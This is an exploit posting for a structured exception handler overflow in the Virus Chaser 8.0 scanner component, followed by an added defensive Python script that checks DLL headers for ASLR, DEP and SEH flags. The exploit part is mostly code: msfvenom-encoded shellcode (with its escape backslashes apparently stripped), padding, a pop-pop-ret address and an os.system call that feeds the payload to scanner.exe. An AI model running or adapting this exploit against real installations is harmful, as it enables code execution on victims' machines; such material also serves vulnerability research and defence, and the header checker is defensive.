
VirusChaser 8.0 Buffer Overflow

Posted on 17 April 2017

# Exploit Title: Virus Chaser 8.0 - Scanner component, SEH Overflow
# Date: 14 April 2017
# Exploit Author: 0x41Li (0x41Li.D@gmail.com)
# Vendor Homepage: https://www.viruschaser.com/
# Software Link: https://www.viruschaser.com/download/VC80b_32Setup.zip
# Tested on: Windows 7 (Universal)

import os
from struct import pack

## msfvenom -a x86 --platform Windows -p windows/exec cmd=calc -b 'x00x0dx0ax09x22' -f c
# x86/shikata_ga_nai succeeded with size 216
## BADCHARS = x00x0dx0ax09 AVOIDED = x22 = " (Cut the buffer)
shellcode= (
"xbex7ax1fx2dx97xdaxd5xd9x74x24xf4x5ax33xc9xb1"
"x30x83xc2x04x31x72x0fx03x72x75xfdxd8x6bx61x83"
"x23x94x71xe4xaax71x40x24xc8xf2xf2x94x9ax57xfe"
"x5fxcex43x75x2dxc7x64x3ex98x31x4axbfxb1x02xcd"
"x43xc8x56x2dx7ax03xabx2cxbbx7ex46x7cx14xf4xf5"
"x91x11x40xc6x1ax69x44x4exfex39x67x7fx51x32x3e"
"x5fx53x97x4axd6x4bxf4x77xa0xe0xcex0cx33x21x1f"
"xecx98x0cx90x1fxe0x49x16xc0x97xa3x65x7dxa0x77"
"x14x59x25x6cxbex2ax9dx48x3fxfex78x1ax33x4bx0e"
"x44x57x4axc3xfex63xc7xe2xd0xe2x93xc0xf4xafx40"
"x68xacx15x26x95xaexf6x97x33xa4x1axc3x49xe7x70"
"x12xdfx9dx36x14xdfx9dx66x7dxeex16xe9xfaxefxfc"
"x4exf4xa5x5dxe6x9dx63x34xbbxc3x93xe2xffxfdx17"
"x07x7fxfax08x62x7ax46x8fx9exf6xd7x7axa1xa5xd8"
"xaexc2x28x4bx32x05")

junk = "A"*688
jmp ="xebx0bx41x41" ## JMP 0B
ret = pack('<L',0x10010c81) #pop ECX #pop ESI #RET [sgbidar.dll] (magic addr)
nop = "x90"*24

payload = junk + jmp + ret + nop + shellcode
print payload
os.system("C:\"Program Files\VirusChaser\scanner.exe" "" + payload + """)
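
A defender-side check for the condition the hardcoded `ret` value above depends on, as an added example that is not part of the original posting: it reads a module's PE header and reports whether a fixed address inside it stays valid across loads (ASLR off). The header bytes are constructed, the image base and size are assumptions (the page does not give the header values of sgbidar.dll), and SafeSEH, which lives in the load-config directory, is not checked here.

```python
import struct

# IMAGE_DLLCHARACTERISTICS_* bits from the PE/COFF specification
DYNAMIC_BASE = 0x0040  # ASLR: loader may relocate the module
NX_COMPAT = 0x0100     # DEP opt-in
NO_SEH = 0x0400        # module registers no SEH handlers

def pe_mitigations(data):
    """Parse raw PE header bytes; return image base, size and mitigation flags."""
    if data[:2] != b"MZ":
        raise ValueError("not an MZ image")
    (e_lfanew,) = struct.unpack_from("<I", data, 0x3C)
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("PE signature missing")
    opt = e_lfanew + 24  # 4-byte signature + 20-byte COFF file header
    (magic,) = struct.unpack_from("<H", data, opt)
    if magic == 0x10B:    # PE32: 32-bit ImageBase at offset 28
        (base,) = struct.unpack_from("<I", data, opt + 28)
    elif magic == 0x20B:  # PE32+: 64-bit ImageBase at offset 24
        (base,) = struct.unpack_from("<Q", data, opt + 24)
    else:
        raise ValueError("unknown optional-header magic")
    (size,) = struct.unpack_from("<I", data, opt + 56)    # SizeOfImage
    (flags,) = struct.unpack_from("<H", data, opt + 70)   # DllCharacteristics
    return {"image_base": base, "size_of_image": size,
            "aslr": bool(flags & DYNAMIC_BASE),
            "dep": bool(flags & NX_COMPAT),
            "no_seh": bool(flags & NO_SEH)}

def exposes_fixed_address(info, addr):
    """True if addr lies in the preferred image range and the module opts out of ASLR."""
    end = info["image_base"] + info["size_of_image"]
    return info["image_base"] <= addr < end and not info["aslr"]

def build_sample(dll_chars, image_base=0x10000000, size=0x40000):
    """Constructed minimal PE32 header (assumed values, not the real DLL)."""
    dos = bytearray(b"MZ") + bytearray(62)
    struct.pack_into("<I", dos, 0x3C, 64)        # e_lfanew
    opt = bytearray(96)
    struct.pack_into("<H", opt, 0, 0x10B)        # PE32 magic
    struct.pack_into("<I", opt, 28, image_base)
    struct.pack_into("<I", opt, 56, size)
    struct.pack_into("<H", opt, 70, dll_chars)
    return bytes(dos) + b"PE\0\0" + bytes(20) + bytes(opt)

if __name__ == "__main__":
    for chars in (0, DYNAMIC_BASE | NX_COMPAT):
        info = pe_mitigations(build_sample(chars))
        print(info, exposes_fixed_address(info, 0x10010C81))
```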

 
